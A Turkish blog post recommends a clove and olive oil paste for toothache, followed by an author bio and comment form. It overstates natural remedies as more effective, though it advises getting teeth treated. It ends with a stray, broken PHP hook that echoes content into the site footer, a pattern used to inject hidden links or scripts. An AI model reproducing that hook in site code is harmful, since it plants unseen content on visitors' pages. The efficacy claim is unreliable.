Diş Ağrısını Gideren Doğal Araçlar

Diş ağrısı dayanılmaz noktaya varınca onu bazen kabir azabı ile mukayese ediyorlar. Bu azaptan kurtulmak için sürekli kaçmaya gerek yok. Çünkü diş ağrısını kesmek için doğal araçlar daha etkilidir.

Diş ağrısını doğal araçlarla kesen reçetesi :

Gıda:

1 çay kaşığı karanfil
 
1 çorba kaşığı zeytin yağı
 
Hazırlanışı:

Karanfil ve zeytinyağı nı havanda dövüp iyice karıştırın. Daha sonra pamuklu çubukla yağı ağrıyan dişin üzerine tıklayın. Bu amaçla sadece karanfil yağından da kullanabilirsiniz, ama zeytinyağı ile hazırlanan bu tarifi daha etkilidir.

Dişe sürdüğünüz yağ yavaşça diş minesine ve sinirlere ulaşacak ve böylece acıyı sakinleştirecek. Karanfil yağı çektikten sonra dişlerde sıcak ve soğuğa geçici hassasiyet olabilir.

Diş ağrısını dindirmek için karanfil yağı geçici çıkış yoludur, bu nedenle en kısa zamanda çürük dişlerinizi tedavi ettirin.

Diş ağrısı son derece dikkat edilmesi gereken ve üzerinde durulması gereken bir rahatsızlıktır. Diş ağrısından geceleriniz ve günleriniz kabus’a dönüşebilir.

Yaklaşık admin

Ben Harun Güçlü 1988 Trabzon akçaabat doğumluyum küçük yaşlarımdan beri araştırmacı ve bilgi paylaşımcı bir insandım, tek hedefim habercilikte doruğa ulaşmak

Ayrıca kontrol

Kanser Hastalarına Büyük Bağış Yaptı !

Kanser hastalarına yardım amaçlı 29 adet yağlı boya ile yapılmış olan tabloyu Necla Yılmaz , ...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

function burakk(){ echo ' } add_action("wp_footer",'burakk');